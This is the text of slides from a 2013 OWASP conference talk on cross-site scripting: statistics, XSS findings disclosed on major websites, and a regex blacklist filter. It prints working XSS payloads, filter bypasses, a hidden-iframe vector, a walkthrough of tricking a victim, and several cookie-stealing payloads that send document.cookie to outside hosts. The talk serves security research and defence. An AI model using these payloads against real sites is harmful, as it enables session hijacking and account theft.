Cross-Site Scripting (XSS): My Love
Where is Secure CODE?
A talk by Ashar Javed
@
OWASP Seminar (RSA Europe 2013)
28-10-2013, Amsterdam
WHO AM I?
a researcher in Ruhr-University Bochum, RUB, Germany
a student working towards his PhD
an XSSer
Listed in almost every Hall of Fame pages
@Soaj1664ashar
WhY I love XSS?
Reason # 1
reason # 2
REASON # 3
I often dream about a world without XSS
Friend's Reaction on reason #3!
Agenda
- Cross-Site Scripting (XSS)
- Identification of Potential XSS Venues
- my XSS Filter
- Conclusion
What is XSS?
"An XSS attack occurs when a script from an untrusted source is executed in rendering a page" [*]
Is Consensus on XSS Definition?
http://drops.dagstuhl.de/opus/volltexte/2013/3905/pdf/dagrep_v002_i010_p001_s12401.pdf
XSS according to OWASP
"Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites"
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Some STATISTICS ABOUT XSS
According to White-hat Security, 53% of web applications have XSS vulnerability [*]
[*] https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf
Some STATISTICS ABOUT XSS ...
According to Google Vulnerability Reward Program's Statistics, XSS is the most reported issue [*]
[*] http://www.nilsjuenemann.de/2012/12/news-about-googles-vulnerability-reward.html
Some STATISTICS ABOUT XSS ...
According to OWASP Top 10, 2013, XSS is at #3 [*]
Some STATISTICS ABOUT XSS ...
According to "Open Sourced Vulnerability Database" (http://www.osvdb.org/osvdb/show_graph/1)
Trustwave global security report
(http://blog.spiderlabs.com/2013/08/the-web-is-vulnerable-xss-on-the-battlefront-part-1.html)
What about Mobile WEB?
Mobile web-sites often starts with a letter "m" or ends in a word "mobi" or "mobile" e.g., http://m.pinterest.com/ or http://m.slashdot.org/ or http://www.jobmail.co.za/mobile/
some facts about mobile web from our survey of 100 sites
69% less HTML code as compare to their desktop variants.
We found JavaScript on 79 sites while only 1 mobile site is using Modernizr (JavaScript library)
XSS on Mobile-web
81 out of 100 popular mobile-sites are vulnerable to XSS!
Our research paper is available at: http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/11/24/lniguide.pdf
HP 2012 Cyber risks report (Top 10 Mobile vulnerabilities)
http://www.hpenterprisesecurity.com/collateral/whitepaper/
HP2012CyberRiskReport_0213.pdf
OWASP Top 10 for Mobiles
https://www.owasp.org/index.php/OWASP_Mobile_Security
_Project#tab=Top_Ten_Mobile_Risks
In short
why you should care about XSS?
Getting Bored ...
Now real ...
Example # 1 (<, "" & > are filtered)
This is one of the Top 20 sites according to latest Alexa rank!
Example # 1 ---
"><img src=x onerror=prompt(1);>
becomes
<input id="query" value=" img src=x onerror=prompt(1); " name="query" title="Enter a keyword or topic" class="dText" aria-haspopup="true" type="text">
Is XSS Possible?
Here it is ...
How?
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
becomes
<input id="query" value="'" marquee="" img="" src="x" onerror="confirm(1)" "="" plaintext\="" |\="" plaintext="" onmouseover="prompt(1)" prompt(1)="" @gmail.com="" isindex="" formaction=":alert(/XSS/)" '--="" alert(1)="" name="query" title="Enter a keyword or topic" class="dText" aria-haspopup="true" type="text">
importance of previous Xss vector
Example # 2
On-demand software as a service (SaaS) learning management system.
< becomes <
> becomes >
" becomes "
e.g.,
"><img src=x onerror=confirm(1);>
convert into
"><img src=x onerror=confirm(1);>
Can you xss this?
Here it is
interesting FIX
Example # 3
A well known website i.e., http://www.slideshare.net
60 million monthly visitors
130 million page-views
As far as I can see, site is pretty-much secure & our favorite vector ...
"><img src=x onerror=prompt(1);>
becomes
"><img src="x">
Another try
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
becomes
Example # 3...
Here It is ...
How?
My Facebook Profile...
Don't Forgot!
Example # 4
Facebook: Biggest Social Network with more than 1 billion user-base!
Bug Bounty Program: https://www.facebook.com/whitehat
So far Facebook has payed more than 1 million dollars in the form of bug bounty reward: https://www.facebook.com/notes/facebook-security/recent-reports-on-our-whitehat-program/10151538365500766
Trusted friend attack: when Guardian angels strike
Hack In The Box, ,Kuala Lumpur: Malaysia 2013
http://conference.hitb.org/hitbsecconf2013kul/ashar-javed/
DeepSec, Vienna Austria 2013
But here we only talk about XSS...
How?
Example # 5
Do you know the guy who was able to XSS every "Security & Protection" pages of PAYPAL?
Here is the answer :)
SNAP-SHOT of EMAILS ...
#1
#2
#3
#4 to #25 DOM XSSes ...
Root Cause ...
https://www.paypal.com/us/webapps/mpp/security/what-is-phishing#legitimate_paypal_emails
Root Cause In this case...
JavaScript controls the location/URL to be displayed in an insecure manner.
DOM objects' references that may be controlled by the attacker should be checked.
Excerts from ""JavaScript Libraries (In)security"" talk by @WisecWisec at OWASP AppSec Research EU 2013
unsafe jquery methods (http://twitpic.com/95n3ak)
DOM XSS exploit
Example # 6
My all-time favorite "Twitter"
Tip: Follow cool people on Twitter & you will learn a lot!
Twitter takes SECURITY seriously and on their mobile side they have started using Content Security Policy (CSP)!
DOM XSS in Twitter Translation
short story
Reflective XSS in Twitter Translation
Example # 7
Microsoft!
I wish they will start a bug bounty program for their web applications ! :)
Reflective XSS in hotmail
May 2012-May 2013 (1 year of reporting vulnerabilities to Microsoft)
DOM XSS in Rediscover.MSN.COM
DOM XSS in REALESTATE.MSN.COM
DOM XSS in Latino.MSN.com
Example # 8
You often see a URL like:
https://www.magentocommerce.com/products/customer
/account/login/?back_url=http://www.magentocommerce.com/boards/
member/messages/view_folder/1/
In the wild, following parameters are very common e.g.,
return-url, ReturnUrl, continue & return_url
Developers forgot to validate ...
Example # 9
Third-party RICH-TEXT editors, Ticketing functionality, Ask question from Support Teams, Developers' forums, Send Private Message feature & Ask a Question on a Forum etc ...
ALL PROVIDE AN OPTION TO ATTACH A FILE
Often leads to Arbitrary File Upload Vulnerability :-(
Example taken from developers' forum
See Allowed FILE TYPES
POC (X.COM)
POC (Paypal Technical merchant support https://ppmts.custhelp.com/)
What is inside FLASH FILE?
XSS Vector
Session Cookie Stealer # 1 (116 char, requires user-interaction)
<a href="javascript:img=new Image();img.src='http://xssplayground.net23.net/xsstest.php?c=='+document.cookie;">X</a>
Session Cookie Stealer # 2 (103 chars & Doesn't requires user interaction)
"><img src=x onerror=document.location='http://xssplayground.net23.net/xsstest.php?c='+document.cookie>
Session Cookie Stealer # 3 (66 chars & Doesn't requires user interaction)
"><svg/onload=window.location='//goo.gl/F7Kb1?c='+document.cookie>
Session Cookie Stealer # 4 (50 chars & Doesn't requires user interaction)
"><svg/onload=location='//goo.gl/F7Kb1?c='+cookie>
Can we further shorten this vector?
But I was wrong :-(
Here is 36 chars vector by "Mario Heiderich" with no user-interaction!
<iframe/onload=src='//x.se/'+cookie>
Recommendation
Example # 10
All "meme" images have been taken from "Google Image Search"
So now what are you expecting on the next slide :-)
XSS in Google Image search ($1337)
Background
Root cause: "Scrapping"
I made a Google Image search with the following input:
"><img src=x onerror=alert(11111111111);>
but got the following alert box ...
Analysis
Another POC
Example # 11
This is one of the Top 20 sites according to latest Alexa rank.
For Logged-in users, site allows to create an HTML page about YOURSELF!
On Server side, site has JavaScript Detection Program in place and if page has "JavaScript", site doesn't allow to proceed.
JavaScript detected
"><img src=x onerror=prompt(1);>
<iframe/src=//goo.gl/nlX0P>
<script src='https://dl.dropbox.com/u/13018058/js.js'></script>
Not bad
This is how admin thinks...
Challenge...
bypass # 1
<a href="jAvAsCrIpT:alert(1)">X</a>
Bypass # 2
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
Bypass # 3 (IE Specific, vbscript)
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))
Bypass # 4 (Opera Specific)
<svg><script>alert( 1)
Bypass # 5
<embed/src=//goo.gl/nlX0P>
<object/data=//goo.gl/nlX0P>
Bypass # 6 to Infinite
No Time :-(
isn't it cool :-)
EXAMPLE # 12 (potential xss house if "username" field is present)
Log-in/Registration Forms
+
Forgot your password
XSS in MailCHIMP in log-in form (alexa rank: 309)
XSS in megashares in log-in form
XSS in wunderground registration form (alexa rank 646)
"Forgot your password" is the most forgotten feature & often poorly implemented
XSS in New york Times (password reset)
XSS in letitbit (password reset, alexa rank 695)
XSS in wordstream (forgot your password)
XSS in in.com password reset feature
Impact of XSS in in.com password reset functionality
poorly implemented "forgot your password"
Another form of poor implementation...
In case, if attacker is unable to found an XSS in password reset feature then with 90% PROBABILTY the following thing is allowed & admin will have a good scary time :-)
Send password reset email to
admin@sitename.com
Example # 13
what I did so far ...
Stored XSS in Yahoo Email box
Story
story CONTINUES
Reflective XSS in yahoo email box
Were Able to broke their one of the important product's XSS Filter
how
soon I realize
here you go
I forgot about Mobile web :-)
I am not going to show you 81 alert/confirm/prompt boxes ...
But I am going to show you LIVE BUT HARMLESS XSS exploit :)
CRICBUZZ, Alexa Rank 2675 (http://m.cricbuzz.com/info/contact)
Attacker knows Site has An XSS
Attacker's Goal (steal session cookie of victim)
STEPS ATTACKER WILL FOLLOW
Prepare the form with XSS PAYLOAD
Construct a web page with form + PAYLOAD
Trick victim to visit attacker's web page
Attacker has the session cookie of the victim
Prepare form with payload
Attacker's page
http://xssplayground.net23.net/victim.html
xssforfunandlearn.host22.com/victim_demo.html
Easiest way to trick victim
250227838_18_answer_1_xlarge.jpeg"></a>
Game over
Another way to exploit xss
@RSnake Interview With A Blackhat (Part 1 & Part 2)
https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/#.Uirp6sazfzF
Some points from interview
goal is to insert an invisible iframe
"><iframe src='http://www.bbc.co.uk/news/' frameborder='0' width='1' height='1'>
Target is
http://www.care2.com/ (Alexa Rank, 2684)
send victim a link & auto-submit the search form
xssplayground.net23.net/victim2.html
POC screen-shots
here it is an iframe
Yet Another XSS exploit i.e., Defacement
153,958 defacements have been archived here: https://www.zone-h.org/archive/special=1
defacement attack vectors
result of defacement
my XSS FILTER
- Regular Expression Based
- Black-list Approach
- Light-weight & Flexible
- Minimum effort from the Developer
- Low run time overhead, if deployed
- In the form of JavaScript Function
background
http://dl.acm.org/citation.cfm?id=1368112
published in 30th ICSE 2008
stop_xss function
1st Regular expression (RE) from STOP_XSS function
/<script[^>]*>.*?<\/script>/
DEMO of 1st re (/<script[^>]*>.*?<\/script>/)
XSS Attack Vector: <script src="https://dl.dropbox.com/u/13018058/js.js"></script>
Another DEMO of 1st re (/<script[^>]*>.*?<\/script>/)
XSS attack vector: <script>confirm(document.cookie)<\/script>
sounds good!
limitations of 1st re
Demo: http://jsfiddle.net/adz8t/
Limitations of 1st RE (no obfuscation support)
our improved form of 1st RE
/<script[^>]*>.*?<\/script>/
has been changed into
/<script[^>]*>[\s\S]*?/
. (dot) becomes [\s\S]
Closing "script" tag gone
Our improved form of 1st re
/<script[^>]*>[\s\S]*?/
obfuscation support (URL, Decimal
& HEX encoding | #2nd, 3rd & 4th RE)
2nd Regular expression (RE) from STOP_XSS function
/([\s"']+on\w+)\s*=/
DEMO of 2nd re
/([\s"']+on\w+)\s*=/
XSS attack vector: <body onload="alert(1)">
Another DEMO of 2nd re
/([\s"']+on\w+)\s*=/
XSS attack vector: <img src="x"onerror =alert(1)>
Yet Another DEMO of 2nd re
/([\s"']+on\w+)\s*=/
XSS attack vector: <img/src=x /alt='Img Not Found'onerror=confirm(1)>
sounds cool!
limitations of 2nd re
Our improved form of 2nd re (#5 re)
/[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/
valid separators in different browsers
https://twitter.com/kinugawamasato
ref: https://zdresearch.com/zdresearch-xss1-challenge-writeup/
valid separators in different browsers
ref: http://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation
3rd Regular expression (RE) from STOP_XSS function
/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/
DEMO of 3rd re
/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/
XSS attack vector:
<p style="background:url(javascript:alert(1))">
Another DEMO of 3rd re
/(=|(U\s*R\s*L\s*\())\s*("|\')?[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/
XSS attack vector: <iframe src="jaVAscRipT:alert(1)">
nice!
limitations of 3rd re
Our improved form of 3rd re (#6th)
/(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/
Our improved form of 3rd re (added re for :) | #7th RE
/:/
colon hurts :)
#8th RE
/<embed[^>]*>[\s\S]*?/
e.g.,
<embed/src=//goo.gl/nlX0P>
#9th RE
/<object[^>]*>[\s\S]*?/
e.g.,
<object/data=//goo.gl/nlX0P>
#10th RE
/<isindex[^>]*>[\s\S]*?/
e.g.,
<isindex action=//goo.gl/nlX0P type=image>
#11th re
/<form[^>]*>[\s\S]*?/
e.g.,
<form action=//goo.gl/nlX0P><input type="submit">
#12th RE
/<meta[^>]*>[\s\S]*?/
e.g.,
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
#13th RE
/<style[^>]*>[\s\S]*?/
e.g., in IE7
<style>#test{x:expression(alert(/XSS/))}</style>
<body><div id="test">X</div></body>
#14th RE
/<applet[^>]*>[\s\S]*?/
e.g., Old Firefox
<applet code="javascript:confirm(document.cookie);">
#15th RE
/[\s\S]data:text\/html[\s\S]/
e.g.,
<iframe/src="data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>">
#16th RE
/[\s\S]xlink:href[\s\S]/
e.g., In Firefox
<math><a xlink:href="//goo.gl/nlX0P">click
#17th RE
/[\s\S]base64[\s\S]/
e.g.,
<iframe/src="data:text/html;	base64

#18th RE
/[\s\S]style[\s\S]/
e.g., IE7
<div style="color:rgb(''�x:expression(alert(1))"></div>
ref: https://twitter.com/XSSVector/status/219173943087599616
#19th RE
/[\s\S]formaction[\s\S]/
e.g.,
<form><input type="image" value="submit" formaction=//goo.gl/nlX0P>
#20th RE
/[\s\S]src[\s\S]/
e.g.,
<iframe src=//goo.gl/nlX0P>
#21th RE
/[\s\S]href[\s\S]/
e.g.,
<a/href=//goo.gl/nlX0P>X</a>
<a/href="j	av
ascript:\u0061lert(1)"><input type="submit">
#22nd to 26th RE
/[\s\S]xmlns[\s\S]/
/[\s\S]xhtml[\s\S]/
/[\s\S]@import[\s\S]/
/[\s\S]!ENTITY.*?SYSTEM[\s\S]/
/[\s\S]pattern(?=.*?=)[\s\S]/
by
https://twitter.com/0x6D6172696F
for example vectors of each category!
Testing
challenge (community feedback)
http://xssplayground.net23.net/xssfilter.html
How much vectors i received?
more than 10K XSS vectors recorded
(SNAPSHOT)
what about bypasses?
ONLY 3 TYPES of Bypasses
The main reasons are:
- Regular Expression for FORM tag Missing
- Regular Expression for ISINDEX tag Missing
- IE9 Specific bypass due to its crazy IMPLEMENTATION :)
winners
https://twitter.com/soaj1664ashar/status/324153228713422849
write-up here: http://pastebin.com/AxYbnufM
IE9 is awesome :-)
In IE9, vertical tab i.e., \u0B can be used an alternative to SPACE separator/character.
e.g., (http://jsfiddle.net/wzG2M/2/)
Credits: Alex (https://twitter.com/insertScript)
\u0B in action
one step further ...
but why only male symbol? :-)
Where is FEMALE symbolic representation? e.g.,
here it is! (\u0c in action)
\u0C === Form feed
one step further
final fuzz
https://twitter.com/soaj1664ashar/status/358574268386246656
Evaluation (effort + performance)
We have added support of XSS filter in WordPress & Drupal
redos (regular expression denial of service attack) benchmark
research impact
(https://twitter.com/ModSecurity/status/281485539574685696)
modsecurity challenge
Cross-site Scripting (XSS) Evasion Challenge
http://www.modsecurity.org/demo/demo-deny-noescape.html
Modsecurity challenge results
http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
Before Conclusion
Conclusion
XSS is unavoidable at least nowadays!
Now its your job to raise the bar for attacker.
At least test your site against OWASP XSS filter evasion cheat sheet + http://pastebin.com/u6FY1xDA
I think and believe that XSS SOLUTION SHOULD BE IN THE FORM OF LAYERS & Content Security Policy (CSP) should be one layer!
thanks!
